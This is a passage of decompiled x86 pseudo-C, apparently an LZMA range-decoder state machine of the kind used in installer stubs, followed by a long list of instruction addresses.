                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t334 = __ebp - 0x70;
                                                            							 *_t334 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t334;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							__eax =  *(__ebp - 0x2c);
                                                            							goto L101;
                                                            						case 0xd:
                                                            							L37:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xd;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t122 = __ebp - 0x70;
                                                            							 *_t122 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t122;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L39:
                                                            							__eax =  *(__ebp - 0x40);
                                                            							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            								goto L48;
                                                            							}
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								goto L54;
                                                            							}
                                                            							L41:
                                                            							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            							 *(__ebp - 0x48) = __eax;
                                                            							__eax = __eax + 1;
                                                            							__eax = __eax << 8;
                                                            							__eax = __eax + __ebx;
                                                            							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edx = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								 *(__ebp - 0x40) = 1;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								__ebx = __ebx + __ebx + 1;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edx;
                                                            								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L39;
                                                            							} else {
                                                            								goto L37;
                                                            							}
                                                            						case 0xe:
                                                            							L46:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xe;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t156 = __ebp - 0x70;
                                                            							 *_t156 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t156;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							while(1) {
                                                            								L48:
                                                            								__eflags = __ebx - 0x100;
                                                            								if(__ebx >= 0x100) {
                                                            									break;
                                                            								}
                                                            								__eax =  *(__ebp - 0x58);
                                                            								__edx = __ebx + __ebx;
                                                            								__ecx =  *(__ebp - 0x10);
                                                            								__esi = __edx + __eax;
                                                            								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            								__ax =  *__esi;
                                                            								 *(__ebp - 0x54) = __esi;
                                                            								__edi = __ax & 0x0000ffff;
                                                            								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            								__eflags =  *(__ebp - 0xc) - __ecx;
                                                            								if( *(__ebp - 0xc) >= __ecx) {
                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            									__cx = __ax;
                                                            									_t170 = __edx + 1; // 0x1
                                                            									__ebx = _t170;
                                                            									__cx = __ax >> 5;
                                                            									__eflags = __eax;
                                                            									 *__esi = __ax;
                                                            								} else {
                                                            									 *(__ebp - 0x10) = __ecx;
                                                            									0x800 = 0x800 - __edi;
                                                            									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            									__ebx = __ebx + __ebx;
                                                            									 *__esi = __cx;
                                                            								}
                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                            									continue;
                                                            								} else {
                                                            									goto L46;
                                                            								}
                                                            							}
                                                            							L54:
                                                            							_t173 = __ebp - 0x34;
                                                            							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            							__eflags =  *_t173;
                                                            							goto L55;
                                                            						case 0xf:
                                                            							L58:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0xf;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t203 = __ebp - 0x70;
                                                            							 *_t203 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t203;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L60:
                                                            							__eflags = __ebx - 0x100;
                                                            							if(__ebx >= 0x100) {
                                                            								L55:
                                                            								__al =  *(__ebp - 0x44);
                                                            								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            								goto L56;
                                                            							}
                                                            							L61:
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__edx = __ebx + __ebx;
                                                            							__ecx =  *(__ebp - 0x10);
                                                            							__esi = __edx + __eax;
                                                            							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            							__ax =  *__esi;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								_t217 = __edx + 1; // 0x1
                                                            								__ebx = _t217;
                                                            								__cx = __ax >> 5;
                                                            								__eflags = __eax;
                                                            								 *__esi = __ax;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								__ebx = __ebx + __ebx;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L60;
                                                            							} else {
                                                            								goto L58;
                                                            							}
                                                            						case 0x10:
                                                            							L109:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x10;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t365 = __ebp - 0x70;
                                                            							 *_t365 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t365;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							goto L111;
                                                            						case 0x11:
                                                            							goto L69;
                                                            						case 0x12:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								__eax =  *(__ebp - 0x58);
                                                            								 *(__ebp - 0x84) = 0x13;
                                                            								__esi =  *(__ebp - 0x58) + 2;
                                                            								goto L132;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							__eflags = __eax;
                                                            							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            							goto L130;
                                                            						case 0x13:
                                                            							__eflags =  *(__ebp - 0x40);
                                                            							if( *(__ebp - 0x40) != 0) {
                                                            								_t469 = __ebp - 0x58;
                                                            								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                            								__eflags =  *_t469;
                                                            								 *(__ebp - 0x30) = 0x10;
                                                            								 *(__ebp - 0x40) = 8;
                                                            								L144:
                                                            								 *(__ebp - 0x7c) = 0x14;
                                                            								goto L145;
                                                            							}
                                                            							__eax =  *(__ebp - 0x4c);
                                                            							__ecx =  *(__ebp - 0x58);
                                                            							__eax =  *(__ebp - 0x4c) << 4;
                                                            							 *(__ebp - 0x30) = 8;
                                                            							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                            							L130:
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							 *(__ebp - 0x40) = 3;
                                                            							goto L144;
                                                            						case 0x14:
                                                            							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                            							__eax =  *(__ebp - 0x80);
                                                            							goto L140;
                                                            						case 0x15:
                                                            							__eax = 0;
                                                            							__eflags =  *(__ebp - 0x38) - 7;
                                                            							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            							__al = __al & 0x000000fd;
                                                            							__eax = (__eflags >= 0) - 1 + 0xb;
                                                            							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                            							goto L120;
                                                            						case 0x16:
                                                            							__eax =  *(__ebp - 0x30);
                                                            							__eflags = __eax - 4;
                                                            							if(__eax >= 4) {
                                                            								_push(3);
                                                            								_pop(__eax);
                                                            							}
                                                            							__ecx =  *(__ebp - 4);
                                                            							 *(__ebp - 0x40) = 6;
                                                            							__eax = __eax << 7;
                                                            							 *(__ebp - 0x7c) = 0x19;
                                                            							 *(__ebp - 0x58) = __eax;
                                                            							goto L145;
                                                            						case 0x17:
                                                            							L145:
                                                            							__eax =  *(__ebp - 0x40);
                                                            							 *(__ebp - 0x50) = 1;
                                                            							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            							goto L149;
                                                            						case 0x18:
                                                            							L146:
                                                            							__eflags =  *(__ebp - 0x6c);
                                                            							if( *(__ebp - 0x6c) == 0) {
                                                            								 *(__ebp - 0x88) = 0x18;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x70);
                                                            							__eax =  *(__ebp - 0xc);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							_t484 = __ebp - 0x70;
                                                            							 *_t484 =  *(__ebp - 0x70) + 1;
                                                            							__eflags =  *_t484;
                                                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            							L148:
                                                            							_t487 = __ebp - 0x48;
                                                            							 *_t487 =  *(__ebp - 0x48) - 1;
                                                            							__eflags =  *_t487;
                                                            							L149:
                                                            							__eflags =  *(__ebp - 0x48);
                                                            							if( *(__ebp - 0x48) <= 0) {
                                                            								__ecx =  *(__ebp - 0x40);
                                                            								__ebx =  *(__ebp - 0x50);
                                                            								0 = 1;
                                                            								__eax = 1 << __cl;
                                                            								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            								__eax =  *(__ebp - 0x7c);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								goto L140;
                                                            							}
                                                            							__eax =  *(__ebp - 0x50);
                                                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            							__eax =  *(__ebp - 0x58);
                                                            							__esi = __edx + __eax;
                                                            							 *(__ebp - 0x54) = __esi;
                                                            							__ax =  *__esi;
                                                            							__edi = __ax & 0x0000ffff;
                                                            							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            							__eflags =  *(__ebp - 0xc) - __ecx;
                                                            							if( *(__ebp - 0xc) >= __ecx) {
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            								__cx = __ax;
                                                            								__cx = __ax >> 5;
                                                            								__eax = __eax - __ecx;
                                                            								__edx = __edx + 1;
                                                            								__eflags = __edx;
                                                            								 *__esi = __ax;
                                                            								 *(__ebp - 0x50) = __edx;
                                                            							} else {
                                                            								 *(__ebp - 0x10) = __ecx;
                                                            								0x800 = 0x800 - __edi;
                                                            								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            								 *__esi = __cx;
                                                            							}
                                                            							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            							if( *(__ebp - 0x10) >= 0x1000000) {
                                                            								goto L148;
                                                            							} else {
                                                            								goto L146;
                                                            							}
                                                            						case 0x19:
                                                            							__eflags = __ebx - 4;
                                                            							if(__ebx < 4) {
                                                            								 *(__ebp - 0x2c) = __ebx;
                                                            								L119:
                                                            								_t393 = __ebp - 0x2c;
                                                            								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                            								__eflags =  *_t393;
                                                            								L120:
                                                            								__eax =  *(__ebp - 0x2c);
                                                            								__eflags = __eax;
                                                            								if(__eax == 0) {
                                                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                            									goto L170;
                                                            								}
                                                            								__eflags = __eax -  *(__ebp - 0x60);
                                                            								if(__eax >  *(__ebp - 0x60)) {
                                                            									goto L171;
                                                            								}
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                            								__eax =  *(__ebp - 0x30);
                                                            								_t400 = __ebp - 0x60;
                                                            								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                            								__eflags =  *_t400;
                                                            								goto L123;
                                                            							}
                                                            							__ecx = __ebx;
                                                            							__eax = __ebx;
                                                            							__ecx = __ebx >> 1;
                                                            							__eax = __ebx & 0x00000001;
                                                            							__ecx = (__ebx >> 1) - 1;
                                                            							__al = __al | 0x00000002;
                                                            							__eax = (__ebx & 0x00000001) << __cl;
                                                            							__eflags = __ebx - 0xe;
                                                            							 *(__ebp - 0x2c) = __eax;
                                                            							if(__ebx >= 0xe) {
                                                            								__ebx = 0;
                                                            								 *(__ebp - 0x48) = __ecx;
                                                            								L102:
                                                            								__eflags =  *(__ebp - 0x48);
                                                            								if( *(__ebp - 0x48) <= 0) {
                                                            									__eax = __eax + __ebx;
                                                            									 *(__ebp - 0x40) = 4;
                                                            									 *(__ebp - 0x2c) = __eax;
                                                            									__eax =  *(__ebp - 4);
                                                            									__eax =  *(__ebp - 4) + 0x644;
                                                            									__eflags = __eax;
                                                            									L108:
                                                            									__ebx = 0;
                                                            									 *(__ebp - 0x58) = __eax;
                                                            									 *(__ebp - 0x50) = 1;
                                                            									 *(__ebp - 0x44) = 0;
                                                            									 *(__ebp - 0x48) = 0;
                                                            									L112:
                                                            									__eax =  *(__ebp - 0x40);
                                                            									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                            										_t391 = __ebp - 0x2c;
                                                            										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                            										__eflags =  *_t391;
                                                            										goto L119;
                                                            									}
                                                            									__eax =  *(__ebp - 0x50);
                                                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                            									__eax =  *(__ebp - 0x58);
                                                            									__esi = __edi + __eax;
                                                            									 *(__ebp - 0x54) = __esi;
                                                            									__ax =  *__esi;
                                                            									__ecx = __ax & 0x0000ffff;
                                                            									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                            									__eflags =  *(__ebp - 0xc) - __edx;
                                                            									if( *(__ebp - 0xc) >= __edx) {
                                                            										__ecx = 0;
                                                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                            										__ecx = 1;
                                                            										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                            										__ebx = 1;
                                                            										__ecx =  *(__ebp - 0x48);
                                                            										__ebx = 1 << __cl;
                                                            										__ecx = 1 << __cl;
                                                            										__ebx =  *(__ebp - 0x44);
                                                            										__ebx =  *(__ebp - 0x44) | __ecx;
                                                            										__cx = __ax;
                                                            										__cx = __ax >> 5;
                                                            										__eax = __eax - __ecx;
                                                            										__edi = __edi + 1;
                                                            										__eflags = __edi;
                                                            										 *(__ebp - 0x44) = __ebx;
                                                            										 *__esi = __ax;
                                                            										 *(__ebp - 0x50) = __edi;
                                                            									} else {
                                                            										 *(__ebp - 0x10) = __edx;
                                                            										0x800 = 0x800 - __ecx;
                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                            										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                            										 *__esi = __dx;
                                                            									}
                                                            									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            									if( *(__ebp - 0x10) >= 0x1000000) {
                                                            										L111:
                                                            										_t368 = __ebp - 0x48;
                                                            										 *_t368 =  *(__ebp - 0x48) + 1;
                                                            										__eflags =  *_t368;
                                                            										goto L112;
                                                            									} else {
                                                            										goto L109;
                                                            									}
                                                            								}
                                                            								__ecx =  *(__ebp - 0xc);
                                                            								__ebx = __ebx + __ebx;
                                                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                            								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            								 *(__ebp - 0x44) = __ebx;
                                                            								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                            									__ecx =  *(__ebp - 0x10);
                                                            									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                            									__ebx = __ebx | 0x00000001;
                                                            									__eflags = __ebx;
                                                            									 *(__ebp - 0x44) = __ebx;
                                                            								}
                                                            								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            								if( *(__ebp - 0x10) >= 0x1000000) {
                                                            									L101:
                                                            									_t338 = __ebp - 0x48;
                                                            									 *_t338 =  *(__ebp - 0x48) - 1;
                                                            									__eflags =  *_t338;
                                                            									goto L102;
                                                            								} else {
                                                            									goto L99;
                                                            								}
                                                            							}
                                                            							__edx =  *(__ebp - 4);
                                                            							__eax = __eax - __ebx;
                                                            							 *(__ebp - 0x40) = __ecx;
                                                            							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            							goto L108;
                                                            						case 0x1a:
                                                            							L56:
                                                            							__eflags =  *(__ebp - 0x64);
                                                            							if( *(__ebp - 0x64) == 0) {
                                                            								 *(__ebp - 0x88) = 0x1a;
                                                            								goto L170;
                                                            							}
                                                            							__ecx =  *(__ebp - 0x68);
                                                            							__al =  *(__ebp - 0x5c);
                                                            							__edx =  *(__ebp - 8);
                                                            							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            							 *( *(__ebp - 0x68)) = __al;
                                                            							__ecx =  *(__ebp - 0x14);
                                                            							 *(__ecx +  *(__ebp - 8)) = __al;
                                                            							__eax = __ecx + 1;
                                                            							__edx = 0;
                                                            							_t192 = __eax %  *(__ebp - 0x74);
                                                            							__eax = __eax /  *(__ebp - 0x74);
                                                            							__edx = _t192;
                                                            							goto L79;
                                                            						case 0x1b:
                                                            							goto L75;
                                                            						case 0x1c:
                                                            							while(1) {
                                                            								L123:
                                                            								__eflags =  *(__ebp - 0x64);
                                                            								if( *(__ebp - 0x64) == 0) {
                                                            									break;
                                                            								}
                                                            								__eax =  *(__ebp - 0x14);
                                                            								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            								__eflags = __eax -  *(__ebp - 0x74);
                                                            								if(__eax >=  *(__ebp - 0x74)) {
                                                            									__eax = __eax +  *(__ebp - 0x74);
                                                            									__eflags = __eax;
                                                            								}
                                                            								__edx =  *(__ebp - 8);
                                                            								__cl =  *(__eax + __edx);
                                                            								__eax =  *(__ebp - 0x14);
                                                            								 *(__ebp - 0x5c) = __cl;
                                                            								 *(__eax + __edx) = __cl;
                                                            								__eax = __eax + 1;
                                                            								__edx = 0;
                                                            								_t414 = __eax %  *(__ebp - 0x74);
                                                            								__eax = __eax /  *(__ebp - 0x74);
                                                            								__edx = _t414;
                                                            								__eax =  *(__ebp - 0x68);
                                                            								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            								__eflags =  *(__ebp - 0x30);
                                                            								 *( *(__ebp - 0x68)) = __cl;
                                                            								 *(__ebp - 0x14) = _t414;
                                                            								if( *(__ebp - 0x30) > 0) {
                                                            									continue;
                                                            								} else {
                                                            									goto L80;
                                                            								}
                                                            							}
                                                            							 *(__ebp - 0x88) = 0x1c;
                                                            							goto L170;
                                                            					}
                                                            				}
                                                            			}













                                                            0x00000000
                                                            0x00406604
                                                            0x00406604
                                                            0x00406608
                                                            0x004066bf
                                                            0x004066c2
                                                            0x004066ce
                                                            0x004065af
                                                            0x004065af
                                                            0x004065b2
                                                            0x00406924
                                                            0x00406924
                                                            0x00406927
                                                            0x00406927
                                                            0x0040692d
                                                            0x00406933
                                                            0x00406939
                                                            0x00406953
                                                            0x00406956
                                                            0x0040695c
                                                            0x00406967
                                                            0x00406969
                                                            0x0040693b
                                                            0x0040693b
                                                            0x0040694a
                                                            0x0040694e
                                                            0x0040694e
                                                            0x00406973
                                                            0x0040699a
                                                            0x0040699a
                                                            0x004069a0
                                                            0x004069a0
                                                            0x00000000
                                                            0x00406975
                                                            0x00406975
                                                            0x00406979
                                                            0x00406b28
                                                            0x00000000
                                                            0x00406b28
                                                            0x00406985
                                                            0x0040698c
                                                            0x00406994
                                                            0x00406997
                                                            0x00000000
                                                            0x00406997
                                                            0x0040660e
                                                            0x00406612
                                                            0x00406b53
                                                            0x00406b53
                                                            0x00406b56
                                                            0x00406b5a
                                                            0x00406b5a
                                                            0x00406618
                                                            0x0040661e
                                                            0x00406621
                                                            0x00406625
                                                            0x00406628
                                                            0x0040662c
                                                            0x00406af2
                                                            0x00406b3e
                                                            0x00406b46
                                                            0x00406b4d
                                                            0x00406b4f
                                                            0x00000000
                                                            0x00406b4f
                                                            0x00406632
                                                            0x00406635
                                                            0x0040663b
                                                            0x0040663d
                                                            0x0040663d
                                                            0x00406640
                                                            0x00406643
                                                            0x00406646
                                                            0x00406649
                                                            0x0040664c
                                                            0x0040664f
                                                            0x00406650
                                                            0x00406652
                                                            0x00406652
                                                            0x00406652
                                                            0x00406655
                                                            0x00406658
                                                            0x0040665b
                                                            0x0040665e
                                                            0x0040665e
                                                            0x00406661
                                                            0x00406663
                                                            0x00406663
                                                            0x00406666
                                                            0x00406666
                                                            0x00406666
                                                            0x0040613c
                                                            0x0040613c
                                                            0x00406145
                                                            0x00000000
                                                            0x00000000
                                                            0x0040614b
                                                            0x00000000
                                                            0x00406156
                                                            0x00000000
                                                            0x00000000
                                                            0x0040615f
                                                            0x00406162
                                                            0x00406165
                                                            0x00406169
                                                            0x00000000
                                                            0x00000000
                                                            0x0040616f
                                                            0x00406172
                                                            0x00406174
                                                            0x00406175
                                                            0x00406178
                                                            0x0040617a
                                                            0x0040617b
                                                            0x0040617d
                                                            0x00406180
                                                            0x00406185
                                                            0x0040618a
                                                            0x00406193
                                                            0x004061a6
                                                            0x004061a9
                                                            0x004061b5
                                                            0x004061dd
                                                            0x004061df
                                                            0x004061ed
                                                            0x004061ed
                                                            0x004061f1
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061e1
                                                            0x004061e4
                                                            0x004061e5
                                                            0x004061e5
                                                            0x00000000
                                                            0x004061e1
                                                            0x004061bb
                                                            0x004061c0
                                                            0x004061c0
                                                            0x004061c9
                                                            0x004061d1
                                                            0x004061d4
                                                            0x00000000
                                                            0x004061da
                                                            0x004061da
                                                            0x00000000
                                                            0x004061da
                                                            0x00000000
                                                            0x004061f7
                                                            0x004061f7
                                                            0x004061fb
                                                            0x00406aa7
                                                            0x00000000
                                                            0x00406aa7
                                                            0x00406204
                                                            0x00406214
                                                            0x00406217
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621a
                                                            0x0040621d
                                                            0x00406221
                                                            0x00000000
                                                            0x00000000
                                                            0x00406223
                                                            0x00406229
                                                            0x00406253
                                                            0x00406259
                                                            0x00406260
                                                            0x00000000
                                                            0x00406260
                                                            0x0040622f
                                                            0x00406232
                                                            0x00406237
                                                            0x00406237
                                                            0x00406242
                                                            0x0040624a
                                                            0x0040624d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406292
                                                            0x00406298
                                                            0x0040629b
                                                            0x004062a8
                                                            0x004062b0
                                                            0x00000000
                                                            0x00000000
                                                            0x00406267
                                                            0x00406267
                                                            0x0040626b
                                                            0x00406ab6
                                                            0x00000000
                                                            0x00406ab6
                                                            0x00406277
                                                            0x00406282
                                                            0x00406282
                                                            0x00406282
                                                            0x00406285
                                                            0x00406288
                                                            0x0040628b
                                                            0x00406290
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004062b8
                                                            0x004062ba
                                                            0x004062bd
                                                            0x0040632e
                                                            0x00406331
                                                            0x00406334
                                                            0x0040633b
                                                            0x00406345
                                                            0x00000000
                                                            0x00406345
                                                            0x004062bf
                                                            0x004062c3
                                                            0x004062c6
                                                            0x004062c8
                                                            0x004062cb
                                                            0x004062ce
                                                            0x004062d0
                                                            0x004062d3
                                                            0x004062d5
                                                            0x004062da
                                                            0x004062dd
                                                            0x004062e0
                                                            0x004062e4
                                                            0x004062eb
                                                            0x004062ee
                                                            0x004062f5
                                                            0x004062f9
                                                            0x00406301
                                                            0x00406301
                                                            0x00406301
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062fb
                                                            0x004062f0
                                                            0x004062f0
                                                            0x004062f0
                                                            0x00406305
                                                            0x00406308
